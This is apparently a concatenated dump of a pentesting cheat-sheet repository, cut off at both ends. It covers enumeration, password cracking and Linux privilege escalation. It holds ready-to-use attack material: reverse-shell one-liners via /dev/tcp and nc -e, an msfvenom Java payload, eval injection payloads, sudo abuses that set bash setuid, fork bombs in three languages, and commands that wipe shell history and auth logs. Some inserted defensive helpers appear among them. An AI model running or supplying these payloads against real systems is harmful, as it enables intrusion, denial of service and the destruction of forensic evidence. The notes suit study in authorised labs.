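    # how a table or column name is passed safely where parameters are not allowed.
    return '"' + name.replace('"', '""') + '"'


def open_sample_db() -> sqlite3.Connection:
    """Constructed sample data standing in for sample.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash BLOB)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", b"\xde\xad\xbe\xef"), (2, "bob", b"\x00\x01")])
    conn.commit()
    return conn


def list_tables(conn) -> list:
    # Equivalent of `.tables`: everything of type 'table' in sqlite_master.
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")
    return [r[0] for r in rows]


def table_columns(conn, table: str) -> list:
    # Equivalent of `PRAGMA table_info(table)`; returns (name, declared type).
    rows = conn.execute("PRAGMA table_info(%s)" % quote_ident(table))
    return [(r[1], r[2]) for r in rows]


def column_as_hex(conn, table: str, column: str) -> list:
    # Equivalent of `SELECT HEX(column) FROM table`; SQLite returns upper-case hex.
    sql = "SELECT HEX(%s) FROM %s" % (quote_ident(column), quote_ident(table))
    return [r[0] for r in conn.execute(sql)]


def dump_rows(conn, table: str) -> list:
    # Equivalent of `SELECT * FROM table`.
    return conn.execute("SELECT * FROM %s" % quote_ident(table)).fetchall()
```

`HEX()` is the quickest way to see BLOB columns that the shell would otherwise print as raw bytes, which is usually where password hashes or tokens live.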
--------------------------------------------------------------------------------
/src/exploit/dns/_data.yml:
--------------------------------------------------------------------------------
1 | category1: dns
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/dns/multicast-dns-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: mDNS (Multicast DNS) Pentesting
3 | description: Multicast DNS protocol resolves hostnames to IP addresses within small networks that do not include a local name server. It is a zero-configuration (zeroconf) service. It uses UDP. A default port is 5353.
4 | tags:
5 | - DNS
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script dns-service-discovery -p 5353
15 | ```
--------------------------------------------------------------------------------
/src/exploit/email/_data.yml:
--------------------------------------------------------------------------------
1 | category1: email
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/email/imap-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: IMAP (Internet Message Access Protocol) Pentesting
3 | description: IMAP is an internet standard protocol used by email clients. Default ports are 143, 993.
4 | tags:
5 | - Email
6 | refs:
7 | date: 2023-03-18
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap --script imap-capabilities -p 143
15 | ```
16 |
17 | ### Banner Grabbing
18 |
19 | ```sh
20 | nc -nv 143
21 | openssl s_client -connect :993 -quiet
22 | ```
23 |
24 |
25 |
26 | ## Connect
27 |
28 | ```bash
29 | telnet 10.0.0.1 143
30 | ```
31 |
32 |
33 |
34 | ## Commands
35 |
36 | ```bash
37 | # Login
38 | a1 login "" ""
39 |
40 | # Logout
41 | a1 logout
42 |
43 | # Close mailbox
44 | a1 close
45 | ```
--------------------------------------------------------------------------------
/src/exploit/email/pop-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: POP (Post Office Protocol) Pentesting
3 | description: Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995.
4 | tags:
5 | - Email
6 | refs:
7 | date: 2023-07-19
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110
15 | ```
16 |
17 |
18 |
19 | ## Connect
20 |
21 | ```bash
22 | nc 110
23 | # or
24 | telnet 110
25 | ```
26 |
27 |
28 |
29 | ## Commands
30 |
31 | ```bash
32 | # Login
33 | USER
34 | PASS
35 |
36 | # Number and total size of all messages
37 | STAT
38 | # List messages and size
39 | LIST
40 | # Retrieve the message of given number
41 | RETR
42 | # Delete the message of given number
43 | DELE
44 | # Reset the mailbox
45 | RSET
46 | # Exit the mail server
47 | QUIT
48 | ```
49 |
--------------------------------------------------------------------------------
/src/exploit/game/_data.yml:
--------------------------------------------------------------------------------
1 | category1: game
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/game/chess-game-cheating.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Chess Game Cheating
3 | description:
4 | tags:
5 | - Game
6 | draft: false
7 | ---
8 |
9 | ## FEN Manipulation
10 |
11 | Forsyth-Edwards Notation (FEN) is a standard notation for describing a particular position of a chess game. The file format is `.fen`.
12 | The [FEN Generator](http://www.netreal.de/Forsyth-Edwards-Notation/index.php) allows us to create a custom FEN string.
13 | For example, the FEN string below describes a position where all of our pieces are queens except the king, and all of the enemy's pieces are pawns except the king.
14 |
15 | ```bash
16 | pppkpppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ
17 | # or
18 | ppppkppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ w KQkq - 0 1
19 | ```
20 |
21 | Then paste the FEN string into a `.fen` file.
22 | Alternatively, paste it into [pastebin](https://pastebin.com/) and click the "raw" button to get a URL for the raw text.
23 | This file can then be uploaded to, or used for manipulation in, the target website.
24 |
--------------------------------------------------------------------------------
/src/exploit/game/minecraft-server-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Minecraft Server Pentesting
3 | description: A Minecraft server is a player-owned or business-owned multiplayer game server. A default port is 25565.
4 | tags:
5 | - Game
6 | refs:
7 | date: 2023-01-26
8 | draft: false
9 | ---
10 |
11 | ## Run a Server
12 |
13 | ```bash
14 | # Create the screen session
15 | screen -C
16 |
17 | # Reattach to the session
18 | screen -r
19 | ```
20 |
21 |
22 |
23 | ## Commands in the Server
24 |
25 | ```bash
26 | # Print usage
27 | help
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/hardware/_data.yml:
--------------------------------------------------------------------------------
1 | category1: hardware
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/hardware/gerber-files.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gerber (GBR) Files
3 | description: The Gerber format is an ASCII, vector format for printed circuit board (PCB) designs.
4 | tags:
5 | - Hardware
6 | refs:
7 | date: 2023-03-23
8 | draft: false
9 | ---
10 |
11 | ## Gerber Viewer
12 |
13 | There are many online tools to view GBR file.
14 |
15 | - [Online Gerber Viewer](https://www.pcbway.com/project/OnlineGerberViewer.html)
--------------------------------------------------------------------------------
/src/exploit/hardware/netgear-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: NETGEAR Pentesting
3 | description: NETGEAR produces networking hardware for consumers, businesses, and service providers.
4 | tags:
5 | - Hardware
6 | - IoT
7 | refs:
8 | date: 2023-01-06
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```sh
15 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502
16 | ```
17 |
18 |
19 |
20 | ## Default Credentials
21 |
22 | ```txt
23 | admin:password
24 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/_data.yml:
--------------------------------------------------------------------------------
1 | category1: linux
2 | related_menus:
3 | - title: Privilege Escalation
4 | id: privilege-escalation
5 | - title: Post Exploitation
6 | id: post-exploitation
7 | - title: Backup
8 | id: backup
9 | - title: Container
10 | id: container
11 | - title: Archive
12 | id: archive
13 | - title: Attack
14 | id: attack
15 | - title: Protocol
16 | id: protocol
17 | - title: Management
18 | id: management
--------------------------------------------------------------------------------
/src/exploit/linux/archive/7z.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: 7z
3 | description: The 7z command is a compression utility that is used to compress and decompress files in Unix, Linux, and other operating systems.
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Compress
12 |
13 | ```sh
14 | # a: Add files to archive
15 | 7z a example.zip example.txt
16 | # With password (the -p switch takes the password directly, with no space)
17 | 7z a example.zip example.txt -ppassword
18 | ```
19 |
20 |
21 |
22 | ## Decompress
23 |
24 | ```sh
25 | # e: Extract files from archive (flattens paths; use x to keep the directory structure)
26 | 7z e example.zip
27 | # With password (no space between -p and the password)
28 | 7z e example.zip -ppassword
29 | ```
30 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/_data.yml:
--------------------------------------------------------------------------------
1 | category2: archive
--------------------------------------------------------------------------------
/src/exploit/linux/archive/bzip-bunzip.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Bzip2 & Bunzip2
3 | description: Bzip2 command is a compression utility in Unix, Linux and other operating systems. It is used to compress and decompress files to reduce their size.
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Compress
12 |
13 | ```sh
14 | bzip2 example.txt
15 | ```
16 |
17 |
18 |
19 | ## Decompress
20 |
21 | ```sh
22 | bzip2 -d example.txt.bz2
23 | bunzip2 example.txt.bz2
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/crack-7z-password.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Crack 7z Password
3 | description: If a 7z file is protected with password, we can crack the password.
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2024-12-18
8 | draft: false
9 | ---
10 |
11 | ## Crack
12 |
13 | ### 1. Convert to Hash
14 |
15 | First we need to convert the `.7z` file to a hash.
16 |
17 | ```sh
18 | 7z2john example.7z > hash.txt
19 | # or
20 | /usr/share/john/7z2john.pl example.7z > hash.txt
21 | ```
22 |
23 | If we get the error “`Can't locate Compress/Raw/Lzma.pm in @INC`...”, we need to install the `libcompress-raw-lzma-perl` package:
24 |
25 | ```bash
26 | sudo apt install libcompress-raw-lzma-perl
27 | ```
28 |
29 | ### 2. Crack the Hash
30 |
31 | Now we can crack the hash with one of the commands below:
32 |
33 | ```sh
34 | john --wordlist=wordlist.txt hash.txt
35 | # or
36 | hashcat -m 11600 hash.txt wordlist.txt
37 | ```
38 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/gzip-gunzip.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gzip & Gunzip
3 | description: Gzip command is a utility that is used to compress and decompress files to reduce their size. The name "gzip" stands for "GNU zip".
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Compress
12 |
13 | ```sh
14 | gzip example.txt
15 | ```
16 |
17 |
18 |
19 | ## Decompress
20 |
21 | ```sh
22 | gzip -d example.txt.gz
23 | gunzip example.txt.gz
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/tar.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Tar
3 | description: Tar command is a utility that is used to create, manipulate, and extract archived files. "tar" stands for "tape archive".
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Archive Files
12 |
13 | ```sh
14 | # -c: Create a new archive
15 | # -f: Use archive file
16 | tar -cf archive.tar example.txt
17 | tar -cf archive.tar example1.txt example2.txt
18 | # -z: filter the archive through gzip
19 | tar -zcf example.tar.gz example/
20 | ```
21 |
22 |
23 |
24 | ## Extract Files
25 |
26 | ```sh
27 | # -x: Extract files from an archive
28 | # -f: Use archive file
29 | tar -xf archive.tar
30 | tar -xf archive.tar.gz
31 | # extract into the given directory (it must already exist)
32 | tar -xf archive.tar --directory archived
33 | ```
34 |
35 |
36 |
37 | ## Display Contents without Extracting
38 |
39 | ```sh
40 | tar -tf archive.tar
41 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/attack/_data.yml:
--------------------------------------------------------------------------------
1 | category2: attack
--------------------------------------------------------------------------------
/src/exploit/linux/attack/fork-bomb.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Fork Bomb
3 | description: Fork Bomb is a denial-of-service attack which leads the system to deplete its available resources by replicating child processes without limit.
4 | tags:
5 | - Linux
6 | refs:
7 | - https://www.geeksforgeeks.org/zombie-processes-prevention/?ref=ml_lbp
8 | - https://www.imperva.com/learn/ddos/fork-bomb/
9 | date: 2023-07-24
10 | draft: false
11 | ---
12 |
13 | ### Warning
14 |
15 | **Please don’t execute the following programs on a system that you don’t want to harm.**
16 |
17 | ## Exploitation in C
18 |
19 | This program forks child processes continuously.
20 |
21 | ```c
22 | #include <sys/types.h>
23 | #include <unistd.h>
24 | 
25 | int main()
26 | {
27 |     while (1)
28 |         // Create a child process from the parent process.
29 |         fork();
30 |     return 0;
31 | }
32 | ```
33 |
34 | ## Exploitation in Python
35 |
36 | ```python
37 | import os
38 |
39 | while True:
40 |     os.fork()
41 | ```
42 |
43 | ## Exploitation in Bash
44 |
45 | ```bash
46 | :(){ :|: & };:
47 | ```
48 |
--------------------------------------------------------------------------------
/src/exploit/linux/backup/_data.yml:
--------------------------------------------------------------------------------
1 | category2: backup
--------------------------------------------------------------------------------
/src/exploit/linux/backup/borgbackup-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: BorgBackup Pentesting
3 | description: A deduplicating backup program.
4 | tags:
5 | - Backup
6 | - Linux
7 | refs:
8 | date: 2023-04-10
9 | draft: false
10 | ---
11 |
12 | ## Extract Archives
13 |
14 | ```sh
15 | borg extract /path/to/repo::<archive-name>
16 | Enter passphrase:
17 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/container/_data.yml:
--------------------------------------------------------------------------------
1 | category2: container
--------------------------------------------------------------------------------
/src/exploit/linux/management/_data.yml:
--------------------------------------------------------------------------------
1 | category2: management
--------------------------------------------------------------------------------
/src/exploit/linux/post-exploitation/_data.yml:
--------------------------------------------------------------------------------
1 | category2: post-exploitation
--------------------------------------------------------------------------------
/src/exploit/linux/post-exploitation/cover-your-tracks-in-linux.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Cover Your Tracks in Linux
3 | description: After exploitation in Linux system, attackers want to erase their activities and be undetectable.
4 | tags:
5 | - Post Exploitation
6 | refs:
7 | - https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/
8 | - https://www.poplabsec.com/how-to-cover-your-tracks-on-linux/
9 | date: 2023-11-15
10 | draft: false
11 | ---
12 |
13 | ## Clear History
14 |
15 | ```bash
16 | unset HISTORY
17 | echo '' > ~/.bash_history
18 | echo '' > /root/.bash_history
19 | history -c
20 | export HISTSIZE=0
21 | unset HISTFILE
22 | ```
23 |
24 |
25 |
26 | ## Clear Logs
27 |
28 | ```bash
29 | # Shrink the size of log files with `truncate -s 0`
30 | truncate -s 0 /var/log/auth.log
31 | echo '' > /var/log/auth.log
32 | cat /dev/null > /var/log/auth.log
33 | > /var/log/auth.log
34 | dd if=/dev/null of=/var/log/auth.log
35 | shred /var/log/auth.log
36 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/_data.yml:
--------------------------------------------------------------------------------
1 | category2: privilege-escalation
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/doas/_data.yml:
--------------------------------------------------------------------------------
1 | category3: doas
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/doas/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Doas Privilege Escalation
3 | description: doas executes arbitrary commands as another user. It's similar to sudo command. doas.conf is interesting to privilege escalation.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | date: 2023-03-07
9 | draft: false
10 | ---
11 |
12 | ## Investigation
13 |
14 | First of all, search for the location of doas.conf.
15 |
16 | ```sh
17 | find / -type f -name "doas.conf" 2>/dev/null
18 | ```
19 |
20 | Next, check the configuration.
21 |
22 | ```sh
23 | doas -C /path/to/doas.conf
24 | doas -C /etc/doas.conf
25 | # or
26 | cat /etc/doas.conf
27 | ```
28 |
29 | Execute doas as below.
30 |
31 | ```sh
32 | doas -u root <command>
33 | ```
34 |
35 | Please also refer to [GTFOBins](https://gtfobins.github.io/) for PrivEsc techniques.
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/firefox-credentials-dumping.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: FireFox Credentials Dumping
3 | description: A .mozilla directory contains a firefox directory that stores credentials. We may dump the credentials and escalate privileges using them.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2024-10-03
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | If there is a `.mozilla/firefox` directory in some user's home directory, we may be able to dump credentials. So check this directory:
14 |
15 | ```sh
16 | ls -al /home/<user>/.mozilla/
17 | ```
18 |
19 |
20 |
21 | ## Dump Passwords from Firefox Profile
22 |
23 | To dump them, use [firefox_decrypt](https://github.com/unode/firefox_decrypt):
24 |
25 | ```sh
26 | python3 firefox_decrypt.py .mozilla/firefox/
27 | ```
28 |
29 | If we are asked for a master password we don’t know, try common passwords.
30 |
31 | ```txt
32 | admin
33 | password
34 | password1
35 | password123
36 | root
37 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/ghidra-debug-mode-rce.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Ghidra Debug Mode RCE
3 | description:
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | - https://www.youtube.com/watch?v=N3VcWIUpgfE
9 | - https://github.com/NationalSecurityAgency/ghidra/issues/6
10 | date: 2023-03-31
11 | draft: false
12 | ---
13 |
14 | ## Exploitation
15 |
16 | ```bash
17 | jdb -attach 127.0.0.1:18001
18 | > classpath
19 | > classes
20 | Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
21 | Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh")
22 | ```
23 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/gnuplot-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gnuplot Privilege Escalation
3 | description: gnuplot is a command-line and GUI program that can generate two- and three-dimensional plots of functions, data, and data fits.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | - http://gnuplot.info/docs_5.5/loc18483.html
9 | date: 2023-06-19
10 | draft: false
11 | ---
12 |
13 | ## Command Execution
14 |
15 | The script file of **`gnuplot`** can be used to execute system commands as below.
16 |
17 | ```bash
18 | gnuplot test.plt
19 | ```
20 |
21 | The contents of the **`.plt`** file look like the following.
22 |
23 | ```bash
24 | system "whoami"
25 |
26 | # Reverse shell
27 | system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/irb-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: irb (Interactive Ruby Shell) Privilege Escalation
3 | description:
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Exploitation
12 |
13 | ```bash
14 | irb
15 |
16 | # %q!...!: Define a string literal (any non-alphanumeric delimiter works)
17 | > exec %q!whoami!
18 | > exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash!
19 | > exec %q!bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"!
20 | ```
21 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/python-eval-code-execution.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Python Eval Code Execution
3 | description: Python's eval() method is vulnerable to arbitrary code execution.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | - Web
8 | refs:
9 | date: 2023-04-11
10 | draft: false
11 | ---
12 |
13 | ## Investigation
14 |
15 | ```py
16 | eval(text)
17 | eval(f"5 + {num}")
18 | ```
19 |
20 | If the Python script allows us to input some value to the **"text"** variable, we can inject arbitrary code.
21 |
22 |
23 |
24 | ## Arbitrary Code Execution
25 |
26 | Most of the time, the input lands inside a larger expression, so we first need to close that surrounding expression before our payload is parsed as valid Python.
27 | 
28 | ```txt
29 | __import__('os').system('id')
30 |
31 |
32 | ),__import__('os').system('id')
33 | '),__import__('os').system('id')
34 | },__import__('os').system('id')
35 | ),__import__('os').system('id')#
36 | ```
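As an added example (not part of the original note), the `eval(f"5 + {num}")` pattern from the Investigation section beside a hardened replacement that parses the input with `ast` and accepts only arithmetic, so the break-out payloads listed in this section are rejected instead of executed:

```python
import ast
import operator

# Added example (not from the original note): the eval() pattern the note
# describes beside a hardened replacement that never calls eval().


def add_five_unsafe(num: str) -> int:
    """Vulnerable: whatever is in `num` is compiled and run as Python."""
    return eval(f"5 + {num}")


# The only syntax the safe evaluator accepts: numeric literals, +, -, *, /, %
# and unary +/-. Everything else (names, calls, attributes, tuples, strings)
# is rejected, which is what blocks __import__('os')... and the break-outs.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _eval_node(node: ast.AST):
    if isinstance(node, ast.Constant):
        if isinstance(node.value, (int, float)) and not isinstance(node.value, bool):
            return node.value
        raise ValueError(f"non-numeric literal: {node.value!r}")
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_arith(expr: str):
    """Evaluate an arithmetic-only expression by walking its AST."""
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        # A break-out such as "),__import__('os')..." is not a valid
        # standalone expression, so it is refused here.
        raise ValueError(f"not a valid expression: {exc.msg}") from None
    return _eval_node(tree.body)


def add_five_safe(num: str):
    """Hardened: the untrusted string is parsed on its own, never spliced into code."""
    return 5 + safe_arith(num)


def is_safe_input(num: str) -> bool:
    """True if `num` would be accepted by the hardened version."""
    try:
        add_five_safe(num)
        return True
    except ValueError:
        return False
```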
37 |
38 | ### Reverse Shell
39 |
40 | ```txt
41 | __import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"')
42 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/rust-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Rust Privilege Escalation
3 | description: Rust is a multi-paradigm, general-purpose programming language that emphasizes performance, type safety, and concurrency. If we have a write permission of a Rust file, we may be able to inject arbitrary code to escalate privileges.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | - https://book.hacktricks.xyz/linux-hardening/privilege-escalation
9 | date: 2023-06-27
10 | draft: false
11 | ---
12 |
13 | ## Reverse Shell
14 |
15 | Reference: https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs
16 |
17 | We can create a binary or module that spawns a reverse shell.
18 |
19 | ```bash
20 | cd /path/to/rust/project/src
21 | vim lib.rs
22 | # (In the vim editor, insert the reverse shell code into the file)
23 | cargo build
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/snapd-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Snapd Privilege Escalation
3 | description: Snapd might be vulnerable to privilege escalation.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | date: 2023-02-05
9 | draft: false
10 | ---
11 |
12 |
13 | ## dirty_sock (CVE-2019-7304) Version < 2.37
14 |
15 | Reference: [https://www.exploit-db.com/exploits/46361](https://www.exploit-db.com/exploits/46361)
16 |
17 |
18 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sssd-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: SSSD Privilege Escalation
3 | description: SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms.
4 | tags:
5 | - Linux
6 | - Privilege Escalation
7 | refs:
8 | date: 2023-04-16
9 | draft: false
10 | ---
11 |
12 | ## Find Credentials
13 |
14 | ```bash
15 | ls -la /var/lib/sss/
16 |
17 | # Find credentials
18 | # If we find the hash, crack it using John or Hashcat.
19 | strings /var/lib/sss/db/example.ldb
20 | ```
21 |
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/_data.yml:
--------------------------------------------------------------------------------
1 | category3: sudo
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-client-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Fail2ban-Client Privilege Escalation
3 | description: Sudo fail2ban-client command might be vulnerable to privilege escalation (PrivEsc).
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2025-03-12
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | sudo -l
15 |
16 | # Output:
17 | (ALL) NOPASSWD: /usr/bin/fail2ban-client
18 | ```
19 |
20 | If we can execute the `fail2ban-client` command as root, we may be able to escalate privileges and gain a root shell.
21 |
22 | ## Exploit
23 |
24 | ```bash
25 | # Get jail list
26 | sudo /usr/bin/fail2ban-client status
27 | # Choose one of the jails from the "Jail list" in the output and use it as <jail> below.
28 | sudo /usr/bin/fail2ban-client get <jail> actions
29 | # Create a new action with an arbitrary name (e.g. "evil")
30 | sudo /usr/bin/fail2ban-client set <jail> addaction evil
31 | # Set payload to actionban
32 | sudo /usr/bin/fail2ban-client set <jail> action evil actionban "chmod +s /bin/bash"
33 | # Trigger the action
34 | sudo /usr/bin/fail2ban-client set <jail> banip 1.2.3.5
35 | # Now we have a root shell
36 | /bin/bash -p
37 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-java-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Java Privilege Escalation
3 | description: Sudo Java is vulnerable to privilege escalation.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-14
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```bash
14 | sudo -l
15 |
16 | (root) /usr/bin/java -jar *.jar
17 | ```
18 |
19 | If we can execute the java command with an arbitrary **`.jar`** file as root, we can escalate privileges.
20 |
21 |
22 |
23 | ## Exploitation
24 |
25 | ### 1. Create a JAR File
26 |
27 | First, create a custom jar file on the local machine.
28 | Replace **`<local-ip>`** with your local IP address.
29 |
30 | ```bash
31 | msfvenom -p java/shell_reverse_tcp LHOST=<local-ip> LPORT=4444 -f jar -o shell.jar
32 | ```
33 |
34 | Then transfer the file to the remote machine.
35 |
36 | ### 2. Reverse Shell
37 |
38 | On the local machine, start a listener.
39 |
40 | ```bash
41 | nc -lvnp 4444
42 | ```
43 |
44 | Now execute the java command as root on the target machine.
45 |
46 | ```bash
47 | sudo /usr/bin/java -jar /tmp/shell.jar
48 | ```
49 |
50 | We should get a root shell.
--------------------------------------------------------------------------------
/src/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Sudo Path Traversal Privilege Escalation
3 | description: If some sudo command receives a file path, we might escalate to privileges using path traversal.
4 | tags:
5 | - Privilege Escalation
6 | refs:
7 | date: 2023-02-05
8 | draft: false
9 | ---
10 |
11 | ## Investigation
12 |
13 | ```sh
14 | sudo -l
15 |
16 | (ALL) /usr/bin/node /usr/local/scripts/*.js
17 | ```
18 |
19 | If the file path uses wildcards, we may be able to execute arbitrary files.
20 | In short, we can refer to files in directories other than the one the system owner intended.
21 |
22 |
23 |
24 | ## Exploitation
25 |
26 | Assume we can execute the ‘node’ command as root with a js file.
27 | Create **“test.js”** under **/tmp**, which spawns a root shell when run by the **‘node’** command.
28 |
29 | ```js
30 | // /tmp/test.js
31 | require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})
32 | ```
33 |
34 | Now run **‘node’** command as root. We can pass the file using path traversal.
35 |
36 | ```sh
37 | sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js
38 | ```
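Added example, not from the original note: why sudo's glob accepts the traversal path above (the argument is matched as a literal string, so `..` is just text) and a small audit helper that flags wildcard arguments in sudoers command specs. The `audit_sudoers_line` parser is a simplified, hypothetical one for the common `user HOST=(runas) [TAG:] cmd args` shape, not sudo's own parser.

```python
import fnmatch
import os

# Constructed example (not from the original note): the sudoers rule from the
# Investigation section and the traversal path from the Exploitation section.
RULE_PATTERN = "/usr/local/scripts/*.js"
TRAVERSAL_ARG = "/usr/local/scripts/../../../tmp/test.js"


def sudo_pattern_matches(pattern: str, arg: str) -> bool:
    """sudo compares the argument string against the glob; '..' is ordinary text,
    and '*' matches '/' as well, so a traversal path satisfies the rule."""
    return fnmatch.fnmatchcase(arg, pattern)


def resolves_inside(arg: str, allowed_dir: str) -> bool:
    """Does the argument, after '..' normalisation, still live under allowed_dir?"""
    resolved = os.path.normpath(arg)
    base = os.path.normpath(allowed_dir)
    return resolved == base or resolved.startswith(base + os.sep)


def is_traversal(pattern: str, arg: str) -> bool:
    """True when the glob accepts the argument but the path escapes the glob's directory."""
    allowed_dir = os.path.dirname(pattern)
    return sudo_pattern_matches(pattern, arg) and not resolves_inside(arg, allowed_dir)


def audit_sudoers_line(line: str) -> list:
    """Return the wildcard-bearing arguments in one sudoers command spec, e.g.
    'alice ALL=(ALL) NOPASSWD: /usr/bin/node /usr/local/scripts/*.js'.
    Simplified (hypothetical) parser for the 'user HOST=(runas) [TAG:] cmd args' shape."""
    findings = []
    if "=" not in line or line.lstrip().startswith("#"):
        return findings
    cmd_specs = line.split("=", 1)[1]
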